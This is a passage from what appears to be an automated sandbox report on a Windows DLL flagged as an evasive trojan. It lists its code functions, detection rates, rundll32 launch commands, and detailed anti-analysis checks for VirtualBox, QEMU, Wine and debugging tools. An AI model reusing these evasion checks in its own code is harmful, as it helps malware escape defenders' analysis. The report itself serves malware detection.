                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33877E7104_2_000001C33877E710
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387567004_2_000001C338756700
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874A7B94_2_000001C33874A7B9
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874A7C24_2_000001C33874A7C2
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874A7A74_2_000001C33874A7A7
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874A7954_2_000001C33874A795
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874A79E4_2_000001C33874A79E
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875E7904_2_000001C33875E790
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387708604_2_000001C338770860
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387608204_2_000001C338760820
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387528D04_2_000001C3387528D0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387568A34_2_000001C3387568A3
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387989504_2_000001C338798950
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33881FA004_2_000001C33881FA00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873D9904_2_000001C33873D990
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387619904_2_000001C338761990
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338759A404_2_000001C338759A40
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338751A004_2_000001C338751A00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338753A9A4_2_000001C338753A9A
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338751B604_2_000001C338751B60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875FB604_2_000001C33875FB60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E9B304_2_000001C3386E9B30
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875BB104_2_000001C33875BB10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338717BB04_2_000001C338717BB0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873DBA04_2_000001C33873DBA0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338759C604_2_000001C338759C60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338717C604_2_000001C338717C60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873DC404_2_000001C33873DC40
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338753C004_2_000001C338753C00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873DC004_2_000001C33873DC00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386F5CD04_2_000001C3386F5CD0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872FCB04_2_000001C33872FCB0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338761C904_2_000001C338761C90
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875FC804_2_000001C33875FC80
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338757D204_2_000001C338757D20
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338751D094_2_000001C338751D09
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875DD104_2_000001C33875DD10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338825E3C4_2_000001C338825E3C
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338791D804_2_000001C338791D80
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338821E604_2_000001C338821E60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874DED04_2_000001C33874DED0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338713E704_2_000001C338713E70
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875FF604_2_000001C33875FF60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E3F304_2_000001C3386E3F30
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338761EF04_2_000001C338761EF0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387920504_2_000001C338792050
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338751FE54_2_000001C338751FE5
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875BFF04_2_000001C33875BFF0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387520E04_2_000001C3387520E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387400C04_2_000001C3387400C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E40904_2_000001C3386E4090
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386EC0A04_2_000001C3386EC0A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387601304_2_000001C338760130
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387631E04_2_000001C3387631E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387411704_2_000001C338741170
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387972304_2_000001C338797230
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387552074_2_000001C338755207
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874F2934_2_000001C33874F293
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873D2704_2_000001C33873D270
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33877D3104_2_000001C33877D310
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875F3E04_2_000001C33875F3E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387653C04_2_000001C3387653C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387533704_2_000001C338753370
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875D4A04_2_000001C33875D4A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387574704_2_000001C338757470
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387015504_2_000001C338701550
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387535414_2_000001C338753541
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387555414_2_000001C338755541
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387635104_2_000001C338763510
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387595A04_2_000001C3387595A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875B5A04_2_000001C33875B5A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387835904_2_000001C338783590
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387556304_2_000001C338755630
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33873D6C04_2_000001C33873D6C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387336A04_2_000001C3387336A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E76A04_2_000001C3386E76A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387576904_2_000001C338757690
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387436704_2_000001C338743670
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E37604_2_000001C3386E3760
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875F7304_2_000001C33875F730
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875D6F04_2_000001C33875D6F0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387618204_2_000001C338761820
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E98194_2_000001C3386E9819
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872F8B04_2_000001C33872F8B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E990A4_2_000001C3386E990A
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387558F04_2_000001C3387558F0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387949C04_2_000001C3387949C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875EA404_2_000001C33875EA40
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338760A304_2_000001C338760A30
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33877EAD04_2_000001C33877EAD0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872EB604_2_000001C33872EB60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33881EA8C4_2_000001C33881EA8C
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338752BE04_2_000001C338752BE0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338756B834_2_000001C338756B83
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338758B904_2_000001C338758B90
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338762B904_2_000001C338762B90
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33876EB704_2_000001C33876EB70
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338734C004_2_000001C338734C00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874ECA04_2_000001C33874ECA0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338832D484_2_000001C338832D48
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338760CF04_2_000001C338760CF0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33878ED904_2_000001C33878ED90
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338742E604_2_000001C338742E60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338752E104_2_000001C338752E10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338726E104_2_000001C338726E10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874EE004_2_000001C33874EE00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33876CE004_2_000001C33876CE00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875EE004_2_000001C33875EE00
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338814F384_2_000001C338814F38
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338754F604_2_000001C338754F60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387E6F104_2_000001C3387E6F10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33877EF104_2_000001C33877EF10
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874EFAA4_2_000001C33874EFAA
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872F0504_2_000001C33872F050
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387350304_2_000001C338735030
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33871D0D04_2_000001C33871D0D0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E915A4_2_000001C3386E915A
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875F1304_2_000001C33875F130
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387591004_2_000001C338759100
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387611004_2_000001C338761100
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387530F04_2_000001C3387530F0
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C338725750 appears 299 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF3025A40 appears 44 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C338725700 appears 66 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF3025750 appears 250 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF3035B10 appears 47 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C33880A1B0 appears 35 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C3387222D0 appears 286 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C33880C220 appears 699 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF3025700 appears 58 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C338725A40 appears 50 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF310C220 appears 590 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021EF30222D0 appears 229 times
                    Source: C:\Windows\System32\rundll32.exeCode function: String function: 000001C338735B10 appears 47 times
                    Source: mount.dllVirustotal: Detection: 49%
                    Source: mount.dllMetadefender: Detection: 22%
                    Source: mount.dllReversingLabs: Detection: 76%
                    Source: mount.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\mount.dll"
                    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mount.dll",#1
                    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mount.dll,shjKeAQfgT
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mount.dll",#1
                    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mount.dll",shjKeAQfgT
                    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mount.dll",#1Jump to behavior
                    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mount.dll,shjKeAQfgTJump to behavior
                    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mount.dll",shjKeAQfgTJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mount.dll",#1Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winDLL@9/0@0/2
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30211C0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize,SysAllocString,SysFreeString,SysFreeString,CoSetProxyBlanket,CoUninitialize,3_2_0000021EF30211C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30210E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,3_2_0000021EF30210E0
                    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mount.dll,shjKeAQfgT
                    Source: rundll32.exeString found in binary or memory: Originator-Return-Address
                    Source: rundll32.exeString found in binary or memory: id-cmc-addExtensions
                    Source: rundll32.exeString found in binary or memory: Accept-Additions
                    Source: rundll32.exeString found in binary or memory: MMHS-Exempted-Address
                    Source: rundll32.exeString found in binary or memory: List-Help
                    Source: rundll32.exeString found in binary or memory: set-addPolicy
                    Source: rundll32.exeString found in binary or memory: id-cmc-addExtensions
                    Source: rundll32.exeString found in binary or memory: List-Help
                    Source: rundll32.exeString found in binary or memory: MMHS-Exempted-Address
                    Source: rundll32.exeString found in binary or memory: Originator-Return-Address
                    Source: rundll32.exeString found in binary or memory: Accept-Additions
                    Source: rundll32.exeString found in binary or memory: set-addPolicy
                    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: mount.dllStatic PE information: Image base 0x180000000 > 0x60000000
                    Source: mount.dllStatic file information: File size 3846656 > 1048576
                    Source: mount.dllStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1f3000
                    Source: mount.dllStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1b1200
                    Source: mount.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                    Source: mount.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF31443B0 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF31443B8 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF31443D0 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF31443C0 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF31443C8 push rax; retf 3_2_0000021EF3144401
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3388443B0 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3388443B8 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3388443C0 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3388443C8 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3388443D0 push rax; retf 4_2_000001C338844401
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3017D40 LoadLibraryA,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueA,CloseHandle,GetProcAddress,CloseHandle,3_2_0000021EF3017D40
                    Source: C:\Windows\System32\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\WineJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\WineJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\WineJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: rundll32.exeBinary or memory string: PROCMON.EXE
                    Source: rundll32.exeBinary or memory string: HOOKEXPLORER.EXE
                    Source: rundll32.exeBinary or memory string: JOEBOXSERVER.EXE
                    Source: rundll32.exeBinary or memory string: AUTORUNSC.EXE
                    Source: rundll32.exeBinary or memory string: OLLYDBG.EXE
                    Source: rundll32.exe, rundll32.exe, 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: rundll32.exeBinary or memory string: QEMU-GA.EXE
                    Source: rundll32.exeBinary or memory string: VMUSRVC.EXE
                    Source: rundll32.exeBinary or memory string: REGMON.EXE
                    Source: rundll32.exeBinary or memory string: WINDBG.EXE
                    Source: rundll32.exeBinary or memory string: AUTORUNS.EXE
                    Source: rundll32.exeBinary or memory string: IMPORTREC.EXE
                    Source: rundll32.exeBinary or memory string: PETOOLS.EXE
                    Source: rundll32.exeBinary or memory string: SNIFF_HIT.EXE
                    Source: rundll32.exeBinary or memory string: PROC_ANALYZER.EXE
                    Source: rundll32.exeBinary or memory string: JOEBOXCONTROL.EXE
                    Source: rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '\\.\VBOXMINIRDRDN\\.\VBOXGUEST\\.\PIPE\VBOXMINIRDDN\\.\VBOXTRAYIPC\\.\PIPE\VBOXTRAYIPCCHECKING DEVICE %S VBOXTRAYTOOLWNDCLASSVBOXTRAYTOOLWNDVIRTUALBOX SHARED FOLDERSVBOXSERVICE.EXEVBOXTRAY.EXECHECKING VIRTUALBOX PROCESS %S SELECT * FROM WIN32_NETWORKADAPTERCONFIGURATIONMACADDRESS08:00:27VBOXVIDEOVBOXVIDEOW8VBOXWDDMSELECT * FROM WIN32_NTEVENTLOGFILEFILENAMESYSTEMSOURCESVIRTUALBOXVBOXVBOXSELECT * FROM WIN32_PNPENTITYDEVICEIDPCI\VEN_80EE&DEV_CAFENAME82801FB82441FX82371SBOPENHCDSELECT * FROM WIN32_BUSACPIBUS_BUS_0PCI_BUS_0PNP_BUS_0SELECT * FROM WIN32_BASEBOARDPRODUCTVIRTUALBOXMANUFACTURERORACLE CORPORATIONSELECT * FROM WIN32_PNPDEVICECAPTIONPNPDEVICEIDVEN_VBOXQEMUQEMU-GA.EXEVDAGENT.EXEVDSERVICE.EXECHECKING QEMU PROCESSES %S QEMU-GASPICE GUEST TOOLSCHECKING QEMU DIRECTORY %S QEMUQEMUBOCHSBXPCWINE_GET_UNIX_FILE_NAMESOFTWARE\WINESYSTEM\CONTROLSET001\SERVICES\VIOSCSISYSTEM\CONTROLSET001\SERVICES\VIOSTORSYSTEM\CONTROLSET001\SERVICES\VIRTIO-FS SERVICESYSTEM\CONTROLSET001\SERVICES\VIRTIOSERIALSYSTEM\CONTROLSET001\SERVICES\BALLOONSYSTEM\CONTROLSET001\SERVICES\BALLOONSERVICESYSTEM\CONTROLSET001\SERVICES\NETKVMSYSTEM32\DRIVERS\BALLOON.SYSSYSTEM32\DRIVERS\NETKVM.SYSSYSTEM32\DRIVERS\PVPANIC.SYSSYSTEM32\DRIVERS\VIOFS.SYSSYSTEM32\DRIVERS\VIOGPUDO.SYSSYSTEM32\DRIVERS\VIOINPUT.SYSSYSTEM32\DRIVERS\VIORNG.SYSSYSTEM32\DRIVERS\VIOSCSI.SYSSYSTEM32\DRIVERS\VIOSER.SYSSYSTEM32\DRIVERS\VIOSTOR.SYSVIRTIO-WIN\CURRENTUSERSANDBOXEMILYHAPUBWSHONG LEEIT-ADMINJOHNSONMILLERMILOZSPETER WILSONTIMMYSAND BOXMALWAREMALTESTTEST USERVIRUSJOHN DOECHECKING IF USERNAME MATCHES : %S VMWARESELECT * FROM WIN32_COMPUTERSYSTEMMODELHVM DOMUPROCEXP64.EXEPRL_CC.EXEPRL_TOOLS.EXECHECKING PARALLELS PROCESSES: %S
                    Source: rundll32.exe, 00000002.00000003.333797150.000001B97EC0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000003.333897258.0000021EF3D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >VMSRVC.EXECHECKING VIRTUAL PC PROCESSES %S VMUSRVC.EXE
                    Source: rundll32.exeBinary or memory string: SYSANALYZER.EXE
                    Source: rundll32.exeBinary or memory string: IDAQ.EXE
                    Source: rundll32.exeBinary or memory string: DUMPCAP.EXE
                    Source: rundll32.exeBinary or memory string: WIRESHARK.EXE
                    Source: rundll32.exeBinary or memory string: FILEMON.EXE
                    Contain functionality to detect virtual machines
                    Source: C:\Windows\System32\rundll32.exeCode function: VBOX VBOX VEN_VBOX 3_2_0000021EF301F9C0
                    Source: C:\Windows\System32\rundll32.exeCode function: qemu-ga qemu-ga Checking QEMU directory %s Checking QEMU directory %s 3_2_0000021EF301FE00
                    Source: C:\Windows\System32\rundll32.exeCode function: VBoxTrayToolWndClass VBoxTrayToolWnd 3_2_0000021EF301DCE2
                    Source: C:\Windows\System32\rundll32.exeCode function: qemu-ga.exe qemu-ga.exe Checking qemu processes %s Checking qemu processes %s 3_2_0000021EF301FD40
                    Source: C:\Windows\System32\rundll32.exeCode function: QEMU QEMU 3_2_0000021EF301FC50
                    Source: C:\Windows\System32\rundll32.exeCode function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 3_2_0000021EF301E430
                    Source: C:\Windows\System32\rundll32.exeCode function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 3_2_0000021EF301E2E0
                    Source: C:\Windows\System32\rundll32.exeCode function: vboxservice.exe vboxservice.exe vboxtray.exe 3_2_0000021EF301E990
                    Source: C:\Windows\System32\rundll32.exeCode function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 3_2_0000021EF301E7D0
                    Source: C:\Windows\System32\rundll32.exeCode function: vboxvideo VBoxVideoW8 VBoxWddm 3_2_0000021EF301EC20
                    Source: C:\Windows\System32\rundll32.exeCode function: vbox VBOX 3_2_0000021EF301EFD0
                    Source: C:\Windows\System32\rundll32.exeCode function: vbox VBOX 3_2_0000021EF301EF51
                    Source: C:\Windows\System32\rundll32.exeCode function: qemu qemu QEMU QEMU 3_2_0000021EF301FFE0
                    Source: C:\Windows\System32\rundll32.exeCode function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 4_2_000001C33871E2E0
                    Source: C:\Windows\System32\rundll32.exeCode function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 4_2_000001C33871E430
                    Source: C:\Windows\System32\rundll32.exeCode function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 4_2_000001C33871E7D0
                    Source: C:\Windows\System32\rundll32.exeCode function: VBOX VBOX VEN_VBOX 4_2_000001C33871F9C0
                    Source: C:\Windows\System32\rundll32.exeCode function: QEMU QEMU 4_2_000001C33871FC50
                    Source: C:\Windows\System32\rundll32.exeCode function: VBoxTrayToolWndClass VBoxTrayToolWnd 4_2_000001C33871DCE2
                    Source: C:\Windows\System32\rundll32.exeCode function: qemu-ga.exe qemu-ga.exe Checking qemu processes %s Checking qemu processes %s 4_2_000001C33871FD40
